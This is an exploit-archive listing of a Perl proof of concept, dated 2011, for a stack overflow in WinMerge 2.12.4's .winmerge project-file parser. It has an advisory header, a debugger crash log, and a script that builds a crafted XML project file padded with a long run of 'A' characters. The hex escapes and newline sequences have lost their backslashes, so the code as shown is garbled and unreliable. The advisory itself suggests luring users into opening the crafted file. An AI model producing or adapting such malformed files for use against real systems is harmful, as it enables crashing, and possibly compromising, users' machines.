WinMerge v2.12.4 Project File Handling Stack Overflow Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : WinMerge v2.12.4 Project File Handling Stack Overflow Vulnerability
# Published : 2011-02-22
# Author : LiquidWorm
# Previous Title : Solar FTP 2.1 Denial of Service Exploit
# Next Title : Nitro PDF Reader 1.4.0 Heap Memory Corruption PoC
#!/usr/bin/perl
#
#
# Title: WinMerge v2.12.4 Project File Handling Stack Overflow Vulnerability
#
#
# Vendor: Thingamahoochie Software
# Product web page: http://www.winmerge.org
# Affected version: 2.12.4.0 Unicode
#
# Summary: WinMerge is an Open Source differencing and merging tool for Windows.
# WinMerge can compare both folders and files, presenting differences in a visual
# text format that is easy to understand and handle. WinMerge is highly useful for
# determining what has changed between project versions, and then merging changes
# between versions. WinMerge can be used as an external differencing/merging tool
# or as a standalone application.
#
# Desc: WinMerge version 2.12.4 suffers from a stack overflow vulnerability because
# it fails to properly sanitize user supplied input when parsing .winmerge project
# file format resulting in a crash overflowing the memory stack. The attacker can
# use this scenario to lure unsuspecting users to open malicious crafted .winmerge
# files with a potential for arbitrary code execution on the affected system.
#
# Tested on: Microsoft Windows XP Professional SP3 (EN)
#
# --------------------------------------------------------------------------------
#
# (e34.10b0): Stack overflow - code c00000fd (first chance)
# First chance exceptions are reported before any exception handling.
# This exception may be expected and handled.
# eax=00000011 ebx=0001f83c ecx=50000161 edx=7ffe0300 esi=00000000 edi=00c30000
# eip=7c90cf78 esp=00033000 ebp=00033238 iopl=0         nv up ei pl nz na po nc
# cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010202
# ntdll!NtAllocateVirtualMemory+0xa:
# 7c90cf78 ff12            call    dword ptr [edx]      ds:0023:7ffe0300={ntdll!KiFastSystemCall (7c90e510)}
# 0:000> g
# (e34.10b0): C++ EH exception - code e06d7363 (first chance)
# (e34.10b0): Access violation - code c0000005 (first chance)
# First chance exceptions are reported before any exception handling.
# This exception may be expected and handled.
# eax=00000d28 ebx=00523001 ecx=00000000 edx=00000000 esi=00000000 edi=00031ad8
# eip=7c90e8e5 esp=00030c9c ebp=000319d4 iopl=0         nv up ei pl nz ac pe nc
# cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010216
# ntdll!strchr+0xd8:
# 7c90e8e5 53              push    ebx
#
# --------------------------------------------------------------------------------
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# liquidworm gmail com
# Zero Science Lab - http://www.zeroscience.mk
#
#
# Advisory ID: ZSL-2010-4997
# Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-4997.php
#
#
# 08.02.2011
#


use strict;

my $project = "thricer.winmerge";

my $begining = "x3Cx3Fx78x6Dx6Cx20x76x65x72x73x69x6Fx6Ex3Dx22x31x2E".
	       "x30x22x20x65x6Ex63x6Fx64x69x6Ex67x3Dx22x55x54x46x2D".
	       "x38x22x20x73x74x61x6Ex64x61x6Cx6Fx6Ex65x3Dx22x79x65".
	       "x73x22x3Fx3Ex0Dx0Ax0Dx0Ax3Cx70x72x6Fx6Ax65x63x74x3E".
	       "x0Dx0Ax20x20x20x3Cx70x61x74x68x73x3Ex0Dx0Ax20x20x20".
	       "x20x20x20x3Cx66x69x6Cx74x65x72x3E";

my $load =     "x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41".
	       "x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41".
	       "x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41".
	       "x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41".
	       "x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41".
	       "x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41".
	       "x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41".
	       "x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41".
	       "x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41".
	       "x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41".
	       "x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41".
	       "x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41".
	       "x41x41x41x41x41x41x41x41x41x41x41x41";

my $ending =   "x2Ax2Ex2Ax3Cx2Fx66x69x6Cx74x65x72x3Ex0Dx0Ax20x20x20".
	       "x20x20x20x3Cx73x75x62x66x6Fx6Cx64x65x72x73x3Ex30x3C".
	       "x2Fx73x75x62x66x6Fx6Cx64x65x72x73x3Ex0Dx0Ax20x20x20".
	       "x20x20x20x3Cx6Cx65x66x74x2Dx72x65x61x64x6Fx6Ex6Cx79".
	       "x3Ex30x3Cx2Fx6Cx65x66x74x2Dx72x65x61x64x6Fx6Ex6Cx79".
	       "x3Ex0Dx0Ax20x20x20x20x20x20x3Cx72x69x67x68x74x2Dx72".
	       "x65x61x64x6Fx6Ex6Cx79x3Ex30x3Cx2Fx72x69x67x68x74x2D".
	       "x72x65x61x64x6Fx6Ex6Cx79x3Ex0Dx0Ax20x20x20x3Cx2Fx70".
	       "x61x74x68x73x3Ex0Dx0Ax3Cx2Fx70x72x6Fx6Ax65x63x74x3E".
	       "x0Dx0A";


print "nn[*] Buffering "$project" file ...n";
open winmerge, ">./$project" || die "nCan't open $project: $!";
print winmerge $begining.$load x(2391-142+1000).$ending;
sleep 2;
print "n[*] File created successfully!nn";
close winmerge;